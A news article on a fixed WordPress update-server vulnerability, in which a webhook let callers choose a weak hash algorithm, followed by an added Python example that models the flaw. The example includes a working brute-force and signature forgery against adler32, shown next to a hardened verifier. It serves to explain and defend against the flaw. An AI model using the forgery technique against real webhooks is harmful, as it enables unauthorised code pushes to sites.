WordPress fixes serious vulnerability in update mechanism


WordPress has fixed a serious security issue after researchers reported it to Automattic. The vulnerability could have allowed an attacker to push malware to WordPress sites, which make up 27 percent of the web, through the automatic update feature.

Security company Wordfence writes that every WordPress site contacts the update server once an hour to check whether a new version of the CMS and related software is available. If there is, the server replies with a URL from which the update is downloaded. An attacker who compromised the update server could therefore change that URL to point at malicious software, the company writes. The number of affected sites would be large, because automatic updates are enabled by default.

The flaw lay in a webhook that lets WordPress developers keep source code on GitHub: when they push code to GitHub, the webhook contacts the update server, which then sends out notifications. According to the security company, the PHP code of this feature contained a vulnerability that could allow an attacker to run arbitrary code on the update server. Because the webhook let the caller choose the hashing algorithm used to authenticate the request, it was possible to select a weak algorithm and then brute-force the authentication.

In this way the shared secret could be recovered within a few hours using the adler32 algorithm, giving access to the update server. Automattic closed the hole in September and paid the security company a reward. The researchers remain critical of the role of the WordPress update server, because it is a single point of failure. Others have criticized the system too; a researcher recently voiced his displeasure on a mailing list.
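The following Python example, added here and not code from WordPress.org or from the Wordfence report, models the webhook flaw described above: a signature check that accepts the hash algorithm named in the request itself, alongside a hardened check that pins the algorithm. Everything in it is assumed for illustration: the `algorithm=hexdigest` header format, a constructed six-character hexadecimal secret, and a probe body. adler32 is modelled as adler32(secret || body), a simplification of PHP's `hash_hmac('adler32', ...)`, which wraps the algorithm in the HMAC construction. The shortcut the brute force takes is this example's own analysis of adler32, not a description of the researchers' proof of concept.

```python
"""Attacker-chosen hash algorithm in a webhook signature check (added example)."""
import hashlib
import hmac
import zlib

MOD = 65521  # adler32 modulus

# Constructed secret for the demo: 6 lowercase hex characters.  The attack below
# assumes the attacker knows only the format (hex, length 6), not the value.
SECRET = b"7c3a9f"
SECRET_LEN = 6
HEX_MIN, HEX_MAX = ord("0"), ord("f")


def keyed_digest(algo: str, key: bytes, body: bytes) -> str:
    """Keyed digest with a caller-selected algorithm, modelling PHP's hash_hmac().

    Cryptographic algorithms go through HMAC; adler32 is modelled as
    adler32(key || body), a simplification of hash_hmac('adler32', ...).
    """
    if algo == "adler32":
        return format(zlib.adler32(key + body), "08x")
    return hmac.new(key, body, algo).hexdigest()  # ValueError for unknown algo


def verify_vulnerable(signature_header: str, body: bytes, secret: bytes = SECRET) -> bool:
    """Flawed check: the algorithm name is taken from the request (assumed format 'algo=hex')."""
    algo, _, sig = signature_header.partition("=")
    try:
        expected = keyed_digest(algo, secret, body)
    except ValueError:
        return False
    return expected == sig  # also a non-constant-time comparison


def verify_hardened(signature_header: str, body: bytes, secret: bytes = SECRET) -> bool:
    """Fixed check: the server pins the algorithm and compares in constant time."""
    algo, _, sig = signature_header.partition("=")
    if algo != "sha256":
        return False
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)


def forge_adler32(a_key: int, b_key: int, body: bytes) -> str:
    """adler32(key || body) depends on the key only through the two running sums
    (a_key, b_key) adler32 holds after consuming the key.  Given those, a valid
    signature for any body can be produced without ever learning the key."""
    a, b = a_key, b_key
    for c in body:
        a = (a + c) % MOD
        b = (b + a) % MOD
    return format((b << 16) | a, "08x")


def recover_key_state(oracle, body: bytes, key_len: int = SECRET_LEN):
    """Brute-force (a_key, b_key) through a valid/invalid oracle such as the server.

    For a key of key_len hex characters both sums lie in small ranges, so the
    number of oracle queries is bounded by their product (433 * 1135 = 491,455
    for key_len == 6) rather than by the 16**6 = 16,777,216 candidate strings.
    Returns (a_key, b_key, queries_used) or None.
    """
    a_lo, a_hi = 1 + HEX_MIN * key_len, 1 + HEX_MAX * key_len
    tri = key_len * (key_len + 1) // 2
    b_lo, b_hi = key_len + HEX_MIN * tri, key_len + HEX_MAX * tri
    queries = 0
    for a_key in range(a_lo, a_hi + 1):
        for b_key in range(b_lo, b_hi + 1):
            queries += 1
            if oracle("adler32=" + forge_adler32(a_key, b_key, body), body):
                return a_key, b_key, queries
    return None


def demo():
    probe = b'{"zen":"probe"}'  # constructed request body used for the search
    a_key, b_key, queries = recover_key_state(verify_vulnerable, probe)
    payload = b'{"ref":"refs/heads/master","after":"deadbeef"}'  # constructed
    forged = "adler32=" + forge_adler32(a_key, b_key, payload)
    return {
        "queries": queries,
        "vulnerable_accepts_forgery": verify_vulnerable(forged, payload),
        "hardened_rejects_forgery": not verify_hardened(forged, payload),
    }


if __name__ == "__main__":
    print(demo())
```

The search never recovers the secret string itself; it recovers a state equivalent to it for every body, which is all an attacker needs to sign arbitrary webhook requests. The hardened verifier removes the attacker's choice entirely: any header that does not name the pinned algorithm is rejected before a digest is computed, and the comparison is constant-time.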
